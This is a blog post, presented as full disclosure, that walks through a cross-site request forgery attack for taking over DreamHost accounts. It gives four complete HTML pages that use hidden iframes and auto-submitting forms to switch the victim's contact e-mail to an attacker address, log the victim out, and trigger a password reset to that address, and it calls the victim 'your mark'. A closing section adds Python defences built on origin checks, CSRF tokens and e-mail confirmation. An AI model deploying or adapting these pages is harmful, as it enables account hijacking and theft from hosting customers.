Security Related

Guy Mizrahi about Security and Technology.

How to Steal DreamHost accounts?

June 14, 2008 | By: Guy Mizrahi | Category: Hacking, Security

I thought a lot before posting this, but in the name of full disclosure...

This is the second time someone has tried to do this against my DreamHost account, so I guess it needs to be public.

It will work against any DreamHost customer whose browser is still logged in to the control panel (note: if you use the logout button, the session is gone and it will not work on your account 🙂).

A legal notice: if you use this to hack into someone’s account, you probably know that it is illegal and I have nothing to do with it. This disclosure is for learning purposes and to make DreamHost fix it ASAP.

A short manual: how to steal DreamHost accounts (I guess it can be used against any account whose control panel has the same defect: state-changing forms that accept any POST arriving with the logged-in user’s cookies, i.e. cross-site request forgery).

So – How?

It is done by sending your mark a link to a page that you create and host online.

There are 4 web pages carrying out 3 stages of the attack:

1. Automatically change the contact details in the DreamHost control panel from your mark’s details to something you have access to (the most important one is the e-mail address).

2. Automatically log your mark off the DreamHost control panel.

3. Request a new password from DreamHost, which is then sent to the new e-mail address.

The first page (let’s call it start.php):

    <html>
    <META content="text/html; charset=iso-8859-8-i" http-equiv=Content-Type>
    <h1>This page can not be found</h1>
    <!-- the two hidden iframes load the next stages -->
    <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info.php" scrolling="no" frameborder="0"></iframe>
    <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0">
    </iframe>
    </html>

As you can see, this page loads two iframes at 0.1% height and width so that the mark can’t see them.

info.php:

    <html>
    <body>
    <!-- a copy of the panel's own contact form, prefilled with the attacker's details -->
    <form method=post action="https://panel.dreamhost.com/id/?" id="2" name="asd">
    <input type=hidden name=tab value="contact">
    <input type=hidden name="command" value="submit_edit">
    <table>
        <tr valign=top>
            <td id=txt align=right><b>Name:</b></td>
            <td><select name="prefix" id=frm>
                    <option value=""></option>
                    </select>
                    <input name="first" value="somename" size="8" id=frm>
                    <input name="middle" size="1" id=frm>
                    <input name="last" value="somefamily" size="8" id=frm>
                    <select name="suffix" id=frm>
                    <option value=""></option>
                    </select>
            </td>
        </tr>
        <tr valign=top>
            <td id=txt align=right><b>Address:</b></td>
            <td><input name="street1" value="somestreet" size=30 id=frm><br>
                    <input name="street2" size=30 id=frm><br>
                    <input name="city" value="somecity"  size=20 id=frm>, <input name="state" size=2 id=frm> <input name="zip" value="1324" size=8 id=frm><br><select name="country" id=frm><option value="US">United States</option>
    </select>
            </td>
        </tr>
        <tr valign=top>
            <td id=txt align=right><b>Email:</b></td>
            <td><input name="email" value="somemail@somedomain.com" size=30 id=frm></td>
        </tr>
        <tr>
            <td id=txt align=right><b>Phone:</b></td>
            <td><input name="phone" value="+123.45.6789123" size=30 id=frm></td>
        </tr>
        <tr>
            <td id=txt align=right><b>Fax:</b>*</td>
            <td><input name="fax" size=30 id=frm></td>
        </tr>
        <tr>
            <td id=txt align=right><b>IM:</b>*</td>
            <td><input name="chat" size=30 id=frm></td>
        </tr>
        <tr>
            <td id=txt align=right><b>URL:</b>*</td>
            <td><input name="url" size=30 id=frm></td>
        </tr>
        <tr>
            <td></td>
            <td id=txt>*optional information</td>
        </tr>
        <tr>
            <td colspan=2 align=center id=txt><input type=submit value="Submit New Contact Info" id=frm><br>or<br></td>
        </tr>
    </table>
    </form>
    <script>
    // submit the form as soon as the page loads; the browser attaches the mark's panel cookies
    document.asd.submit();
    </script>
    <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0"></iframe>
    </body>
    </html>

As you can see, this page submits the form automatically and changes the mark’s DreamHost control panel contact details to whatever you want, then loads info3.php in a hidden iframe.

info3.php:

    <html>
    <iframe height="0.1%" width="0.1%" src="https://panel.dreamhost.com/index.cgi?Nscmd=Nlogout" scrolling="no" frameborder="0">
    </iframe>
    <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info2.html" scrolling="no" frameborder="0"></iframe>
    </html>

As you can see, info3.php does two things:

1. Logs your mark off the DreamHost control panel (by loading the logout URL in a hidden iframe).

2. Loads info2.html.

info2.html:

    <html>
    <body onload="document.getElementById('2').submit()">
    <form method="post" class="fancyform" action="https://panel.dreamhost.com/login/forgot.cgi" id="2">
    <input type="hidden" name="return_url" value="" />
    <input type="hidden" name="email_pwd_submitted" value="1" />
    <input name="email" class="text" value="somemail@somedomain.com">
    <input type="submit" class="button" value="Email me my password!">
    </form>
    </body>
    </html>

This last step submits a forgotten-password request, so DreamHost sends the password notice to the new e-mail address.

That’s it: 4 pages and you can get any DreamHost account...
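What all three stages rely on is that the control panel’s state-changing forms accept any POST that arrives with the mark’s session cookie. As an added, defender-side example (not part of this post and not DreamHost’s code; the origin https://panel.example.com, the in-memory session store and the mail outbox are constructed stand-ins), here is a Python handler for the contact-details update that would break the chain above: it rejects requests whose Origin or Referer is not the panel’s own, requires a synchronizer token that only a page served by the panel can embed in its form, and holds a new contact e-mail as pending until the new address confirms it, so a forgot-password request still goes to the address the owner controls.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed value for the demo (an assumption, not DreamHost's real configuration).
PANEL_ORIGIN = "https://panel.example.com"


@dataclass
class Session:
    user: str
    email: str                              # address that password resets are sent to
    csrf_key: bytes = field(default_factory=lambda: secrets.token_bytes(32))
    pending_email: Optional[str] = None     # new address waiting for confirmation
    confirm_token: Optional[str] = None


SESSIONS: Dict[str, Session] = {}           # session cookie value -> Session
OUTBOX: List[Tuple[str, str]] = []          # (recipient, message): stand-in for outgoing mail


def login(user: str, email: str) -> str:
    """Create a session and return the value the server would set as the session cookie."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = Session(user=user, email=email)
    return sid


def csrf_token(sid: str) -> str:
    """Synchronizer token: HMAC of the session id under a per-session key.
    The panel embeds it as a hidden field in its own forms; a page on another
    site cannot read it, so a forged copy of the form cannot include it."""
    return hmac.new(SESSIONS[sid].csrf_key, sid.encode(), hashlib.sha256).hexdigest()


def handle_contact_update(cookies: Dict[str, str], headers: Dict[str, str],
                          form: Dict[str, str]) -> Tuple[int, str]:
    """Hardened handler for the contact-details POST that a forged form would target.
    Returns an (HTTP status, message) pair."""
    sid = cookies.get("session", "")
    sess = SESSIONS.get(sid)
    if sess is None:
        return 401, "not logged in"
    # 1. Origin/Referer check: a form auto-submitted from another site carries that
    #    site's origin. Exact match or "origin/..." so a look-alike host does not pass.
    origin = headers.get("Origin") or headers.get("Referer", "")
    if origin != PANEL_ORIGIN and not origin.startswith(PANEL_ORIGIN + "/"):
        return 403, "cross-origin request rejected"
    # 2. Synchronizer token: missing or wrong on any request not built from the panel's page.
    if not hmac.compare_digest(form.get("csrf_token", ""), csrf_token(sid)):
        return 403, "missing or invalid CSRF token"
    # 3. A new contact email does not take effect until the new address confirms it,
    #    and the old address is told, so a forgot-password mail keeps going to the owner.
    new_email = form.get("email", "").strip()
    if new_email and new_email != sess.email:
        sess.pending_email = new_email
        sess.confirm_token = secrets.token_urlsafe(16)
        OUTBOX.append((new_email, "confirm:" + sess.confirm_token))
        OUTBOX.append((sess.email, "notice: someone asked to change your contact email"))
        return 202, "confirmation sent to the new address"
    return 200, "contact info updated"


def confirm_email(sid: str, token: str) -> bool:
    """Called from the link in the confirmation mail; only then does the change apply."""
    sess = SESSIONS[sid]
    if sess.pending_email and sess.confirm_token and hmac.compare_digest(token, sess.confirm_token):
        sess.email, sess.pending_email, sess.confirm_token = sess.pending_email, None, None
        return True
    return False


def password_reset_target(sid: str) -> str:
    """Address a forgot-password handler would mail: the confirmed one, never the pending one."""
    return SESSIONS[sid].email


if __name__ == "__main__":
    sid = login("victim", "owner@example.org")
    # A cross-site auto-submitted form: the browser attaches the cookie, nothing else matches.
    print(handle_contact_update({"session": sid}, {"Origin": "http://somedomain.com"},
                                {"email": "somemail@somedomain.com"}))
    # The panel's own form: same origin, token present, change held until confirmed.
    print(handle_contact_update({"session": sid}, {"Origin": PANEL_ORIGIN},
                                {"email": "new@example.org", "csrf_token": csrf_token(sid)}))
    print(password_reset_target(sid))
```

The first two checks stop the forged contact update; the third makes the password-reset stage harmless even if an update somehow got through, because the reset mail still goes to the confirmed address. The same token check belongs on the logout and forgot-password handlers too, since the forced logout above is itself a cross-site request with side effects. In today’s browsers a session cookie marked SameSite=Lax or Strict would also stop the cookie being attached to the cross-site POST in the first place; the checks above are the defence in depth behind that.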

